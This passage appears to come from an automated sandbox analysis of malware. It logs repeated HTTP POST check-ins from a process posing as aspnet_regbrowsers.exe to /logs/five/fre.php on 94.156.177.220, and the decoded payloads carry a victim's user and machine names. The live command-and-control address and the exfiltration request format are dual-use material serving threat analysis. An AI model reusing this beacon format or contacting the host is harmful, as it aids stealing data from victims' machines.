                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  21192.168.2.224919494.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:26.311105013 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:26.316456079 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:27.298777103 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:27 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  22192.168.2.224919594.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:27.440922976 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:27.446562052 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:28.410665035 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:28 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  23192.168.2.224919694.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:28.764265060 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:28.769767046 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:29.712379932 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:29 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  24192.168.2.224919794.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:30.184264898 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:30.189639091 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:31.143742085 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:30 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  25192.168.2.224919894.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:31.286371946 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:31.291768074 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:32.248831034 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:32 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  26192.168.2.224919994.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:33.443099976 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:33.448528051 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:34.425381899 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:34 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  27192.168.2.224920094.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:34.568073988 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:34.573615074 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:35.531173944 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:35 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  28192.168.2.224920194.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:36.348613024 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:36.354023933 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:37.314908981 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:37 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  29192.168.2.224920294.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:37.466938019 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:37.472418070 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:38.422051907 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:38 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  30192.168.2.224920394.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:38.844625950 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:38.850079060 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:39.810425997 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:39 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  31192.168.2.224920494.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:39.969348907 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:39.974781036 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:40.938297033 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:40 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  32192.168.2.224920594.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:41.087920904 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:41.093295097 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:42.047683954 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:41 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  33192.168.2.224920694.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:42.217900038 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:42.223443985 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:43.173814058 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:43 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  34192.168.2.224920794.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:43.317250967 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:43.323473930 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:44.297540903 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:44 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  35192.168.2.224920894.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:44.438281059 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:44.443649054 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:45.415221930 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:45 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  36192.168.2.224920994.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:45.588602066 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:45.594078064 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:46.561891079 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:46 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  37192.168.2.224921094.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:46.714354992 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:46.719815969 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:47.688167095 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:47 GMT
